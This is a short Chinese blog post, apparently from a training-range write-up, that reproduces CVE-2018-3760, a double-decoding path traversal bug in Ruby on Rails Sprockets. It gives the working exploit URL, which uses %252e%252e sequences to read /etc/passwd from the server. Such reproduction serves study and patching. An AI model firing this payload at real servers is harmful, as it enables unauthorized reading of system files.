Ruby On Rails 路径穿越漏洞(CVE-2018-3760)复现

0x0 漏洞简介

漏洞编号:CVE-2018-3760

漏洞描述:Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上任意文件。

影响范围:Sprockets 3.7.1及之前版本

0x1 环境搭建

这里直接用墨者学院的靶场:Ruby On Rails漏洞复现第一题(CVE-2018-3760)
如果是自己搭建的环境默认端口为3000

0x2 漏洞复现

目标是读取本机中的passwd文件,访问http://ip:端口/assets/file:%2f%2f/etc/passwd查看报错信息


错误提示/etc/passwd是不允许加载的路径,并且列出了允许加载的路径,这里随便选用一个可以加载的路径,并将..进行url进行二次编码

访问
http://ip:端口/assets/file:%2f%2f/usr/src/blog/app/assets/config/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

0x3 参考文章

Ruby on Rails 路径穿越与任意文件读取漏洞分析 -【CVE-2018-3760】

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容